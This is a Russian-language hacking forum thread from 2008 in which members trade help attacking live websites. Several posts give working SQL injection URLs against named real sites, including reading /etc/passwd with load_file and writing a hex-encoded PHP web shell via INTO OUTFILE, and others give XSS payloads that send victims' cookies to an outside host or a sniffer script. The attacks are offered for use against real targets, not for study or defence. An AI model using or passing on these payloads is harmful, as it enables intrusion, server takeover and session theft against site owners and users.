Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pingvincible

    pingvincible New Member

    Joined:
    3 Nov 2008
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    дает ли что-то такая ошибка привыполнении следующего запроса:

     
  2. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    2pingvincible

    Это означает что else испаользуется в коде без if

    ни чего ты запросами вида http://site.com/?cat=4-1 не сможешь сделать
     
  3. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Кроме раскрытия путей ничего не даёт..
     
  4. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    Один очень интересный мне сайт имеет багу, инъекция слепая.
    кавычки:
    1) слешируются
    2) подстановка кавычек обрабатывается и выдает пустую страницу.
    http://site.ru/index.php?act=18/**/union/**/select/**/concat_ws(0x3a,table_name)/**/from/**/information_schema.tables/**/limit/**/0,1--
    всего одна таблица. надо вытащить её название и после колонок в ней.

    http://site.ru/index.php?act=25+AND+ascii(lower(substring(user(),1,1)))=97--
    юзера, систем_юзера подобрал. версия мускль 5.

    http://site.ru/index.php?act=25+union+select+load_file(0x2F6574632F706173737764)--
    особо интересно получить содержимое файла /etc/paswd. или на крайний случай выжать максимально информации.
    За помощь + обеспечен -)
     
  5. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    я в хсс чайник пока полный. Вот есть пассивная хсс вот я щелкаю по ссылке у меня доходит до странички с хсс а можно сделать так чтобы он после поподания на эту страничку переходил на другую например показывал какую нибудь картинку.
     
  6. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Я тож в хсс не особо шарю....но там вродь нада составить скрипт который перекидует выполнять то что те нужно и вставить его в уязвимое поле...
    P.S.:Если чтот не так написал просьба сильно не пинать...)
     
  7. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    да.
    js примерно следующего содержания
    <script>
    document.location.href="http://yandex.ru";
    </script>
    оно тебя перенаправит сам понимаешь куда))
     
  8. none222

    none222 Guest

    Reputations:
    0
    В ифрейм вставь ссылку со своей КСС - и всё бут нормально. ЕСли хочешь, ниже редиррект ещё припиши
     
  9. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    что не получается.У меня такого плана index js
    в индексе пишу так
    <script>document.location.href="ТУТ у меня хсс "</script>
    а в js
    img = new Image(); img.src = "http://na-s.ru/images/S0ulVortex_1.gif?"+document.cookie;
    Я эту систему взял из видео где показывают хсс yandex

    Может у кого есть другая система похожая на эту только чтобы после того как куки крадет кидала на какуюнють картинку или сайт
     
    #3669 S0ulVortex, 15 Nov 2008
    Last edited: 15 Nov 2008
  10. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    код чтобы перенаправить на сниффер + кук
    http://site.ru/index.php?xss='><script>document.location.href='your_site/sniffer.php?cookie='+document.cookie;</script>
     
    1 person likes this.
  11. Parti

    Parti New Member

    Joined:
    7 Oct 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Добрый день

    Как реализовать атаку SQL Injection в среде Interbase (Firebird)?

    Code:
    Warning: ibase_query(): Dynamic SQL Error SQL error code = -104 Token unknown - line 1, char 78 UNION in Firebird.php
    Поддерживает ли Interbase установку UNION?

    Был ли кого у опыт проведения атаки используя данную технологию?

    Спасибо.
     
    #3671 Parti, 15 Nov 2008
    Last edited: 15 Nov 2008
  12. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.nkzu.kz/new1/site_news.asp?id=123'

    Microsoft JET Database Engine error '80040e14'

    говорят не инжектится, но мне давным давно кто-то показал что таки извлеч инфу можно. Извлекали из табля news. Есть идеи как эту скулу раскрутить?
     
    #3672 truelamer, 15 Nov 2008
    Last edited: 15 Nov 2008
  13. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    Parti, да в ibase можно объединять запросы оператором union; sql-inj хз смотря как построен запрос - попробуй perl-утилиту isr-sqlget
    truelamer, _http://forum.antichat.ru/thread50550.html
     
    2 people like this.
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Есть сайт, на нём бажный скрипт

    script.php?id=-1+union+select+1,2,3,4,5,load_file(0x2F6574632F706173737764),7,8,9,10/*

    выдаёт содержимое etc\passwd ..

    как мне шелл залить теперь?
     
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Кто говорит? Просто это Access, и всё немного подругому, если хочешь подбирай таблицы и поля:

    http://www.nkzu.kz/new1/site_news.asp?id=240+union+select+1,2,3,4,5,6+from+tblnews

    попугай
    Вчера расписывал ответ на такой-же вопрос:
    https://forum.antichat.ru/showpost.php?p=942609&postcount=34
     
    5 people like this.
  16. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    2 jokester&l1ght

    Спаcибо огромное)

    а как узнал о существовании tblnews ???
     
    1 person likes this.
  17. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    попугай

    script.php?id=-1+union+select+1,2,3,4,5,0x3c3f2073797374656d28245f4745545b27636d64275d293b203f3e,7,8,9,10+from+table_name+into+outfile+'/var/www/html/tmp/shell_name.php'/*

    Где /var/www/html/tmp/ -путь к директории, доступной на запись (ковыряй, ищи), table_name имя любой таблицы,shell_name.php имя шелла (главное, чтоб в этой директории не было такого же =) ), а 0x3c3f2073797374656d28245f4745545b27636d64275d293b203f3e -это захексенное '<?system($_GET[cmd]);?>', главное, чтобы кавычки прокатывали.

    UPD
    Не успел, ответили раньше =)
     
    3 people like this.
  18. Parti

    Parti New Member

    Joined:
    7 Oct 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    l1ght
    А если вручную? Какая последовательность действий для инъекции в Interbase?

    SQL Инъеция после WHERE
    SELECT * WHERE ID=[SQL INJ]
     
    1 person likes this.
  19. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    почему когда я отправляю запрос
    www.grog-ink.com/detail.asp?ID=1 or 1=@@version--
    мне выводит:
    А не нужные мне параметры? Запрос по сути верный..
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ershik
    Ты путаешь с MSSQL , а это Access, там немного другой синтаксис, и твой запрос не верен
     
    1 person likes this.
Thread Status:
Not open for further replies.